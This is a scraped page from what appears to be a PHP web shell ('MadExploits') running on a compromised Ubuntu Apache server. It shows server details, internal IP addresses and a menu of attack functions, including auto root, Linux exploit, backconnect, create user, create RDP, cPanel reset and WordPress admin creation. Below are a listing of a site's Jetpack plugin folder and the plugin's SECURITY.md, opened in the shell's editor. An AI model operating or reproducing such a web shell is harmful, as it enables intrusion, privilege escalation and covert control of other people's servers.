Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cilab /
wp-content /
plugins /
jetpack /
[ HOME SHELL ]
Name
Size
Permission
Action
3rd-party
[ DIR ]
drwxr-xr-x
_inc
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
extensions
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
jetpack_vendor
[ DIR ]
drwxr-xr-x
json-endpoints
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
sal
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
views
[ DIR ]
drwxr-xr-x
CHANGELOG.md
650.24
KB
-rw-r--r--
LICENSE.txt
17.98
KB
-rw-r--r--
SECURITY.md
2.45
KB
-rw-r--r--
class-jetpack-connection-statu...
728
B
-rw-r--r--
class-jetpack-gallery-settings...
3.38
KB
-rw-r--r--
class-jetpack-pre-connection-j...
2.34
KB
-rw-r--r--
class-jetpack-stats-dashboard-...
7.77
KB
-rw-r--r--
class-jetpack-xmlrpc-methods.p...
8.33
KB
-rw-r--r--
class.frame-nonce-preview.php
3.22
KB
-rw-r--r--
class.jetpack-admin.php
20.13
KB
-rw-r--r--
class.jetpack-affiliate.php
205
B
-rw-r--r--
class.jetpack-autoupdate.php
9.74
KB
-rw-r--r--
class.jetpack-bbpress-json-api...
220
B
-rw-r--r--
class.jetpack-cli.php
71.8
KB
-rw-r--r--
class.jetpack-client-server.ph...
2.62
KB
-rw-r--r--
class.jetpack-gutenberg.php
42.38
KB
-rw-r--r--
class.jetpack-heartbeat.php
4.55
KB
-rw-r--r--
class.jetpack-modules-list-tab...
14.79
KB
-rw-r--r--
class.jetpack-network-sites-li...
5.98
KB
-rw-r--r--
class.jetpack-network.php
21.05
KB
-rw-r--r--
class.jetpack-plan.php
4.09
KB
-rw-r--r--
class.jetpack-post-images.php
33.83
KB
-rw-r--r--
class.jetpack-twitter-cards.ph...
12.92
KB
-rw-r--r--
class.jetpack-user-agent.php
25.3
KB
-rw-r--r--
class.jetpack.php
211.39
KB
-rw-r--r--
class.json-api-endpoints.php
82.84
KB
-rw-r--r--
class.json-api.php
34.47
KB
-rw-r--r--
class.photon.php
1.74
KB
-rw-r--r--
composer.json
3.83
KB
-rw-r--r--
enhanced-open-graph.php
4.35
KB
-rw-r--r--
functions.compat.php
4.28
KB
-rw-r--r--
functions.cookies.php
2.04
KB
-rw-r--r--
functions.global.php
15.21
KB
-rw-r--r--
functions.is-mobile.php
2.47
KB
-rw-r--r--
functions.opengraph.php
21.38
KB
-rw-r--r--
functions.photon.php
3.04
KB
-rw-r--r--
global.d.ts
48
B
-rw-r--r--
jetpack.php
8.58
KB
-rw-r--r--
json-api-config.php
338
B
-rw-r--r--
json-endpoints.php
6.92
KB
-rw-r--r--
load-jetpack.php
3.1
KB
-rw-r--r--
locales.php
324
B
-rw-r--r--
readme.txt
30.83
KB
-rw-r--r--
uninstall.php
1.6
KB
-rw-r--r--
wpml-config.xml
1.26
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SECURITY.md
# Security Policy Full details of the Automattic Security Policy can be found on [automattic.com](https://automattic.com/security/). ## Supported Versions Generally, only the latest version of Jetpack and its associated plugins have continued support. If a critical vulnerability is found in the current version of a plugin, we may opt to backport any patches to previous versions. ## Reporting a Vulnerability Our HackerOne program covers the below plugin software, as well as a variety of related projects and infrastructure: * [Jetpack](https://jetpack.com/) * Jetpack Backup * Jetpack Boost * Jetpack CRM * Jetpack Protect * Jetpack Search * Jetpack Social * Jetpack VideoPress **For responsible disclosure of security issues and to be eligible for our bug bounty program, please submit your report via the [HackerOne](https://hackerone.com/automattic) portal.** Our most critical targets are: * Jetpack and the Jetpack composer packages (all within this repo) * Jetpack.com -- the primary marketing site. * cloud.jetpack.com -- a management site. * wordpress.com -- the shared management site for both Jetpack and WordPress.com sites. For more targets, see the `In Scope` section on [HackerOne](https://hackerone.com/automattic). _Please note that the **WordPress software is a separate entity** from Automattic. Please report vulnerabilities for WordPress through [the WordPress Foundation's HackerOne page](https://hackerone.com/wordpress)._ ## Guidelines We're committed to working with security researchers to resolve the vulnerabilities they discover. You can help us by following these guidelines: * Follow [HackerOne's disclosure guidelines](https://www.hackerone.com/disclosure-guidelines). * Pen-testing Production: * Please **setup a local environment** instead whenever possible. Most of our code is open source (see above). * If that's not possible, **limit any data access/modification** to the bare minimum necessary to reproduce a PoC. * **_Don't_ automate form submissions!** That's very annoying for us, because it adds extra work for the volunteers who manage those systems, and reduces the signal/noise ratio in our communication channels. * To be eligible for a bounty, all of these guidelines must be followed. * Be Patient - Give us a reasonable time to correct the issue before you disclose the vulnerability. We also expect you to comply with all applicable laws. You're responsible to pay any taxes associated with your bounties.
Close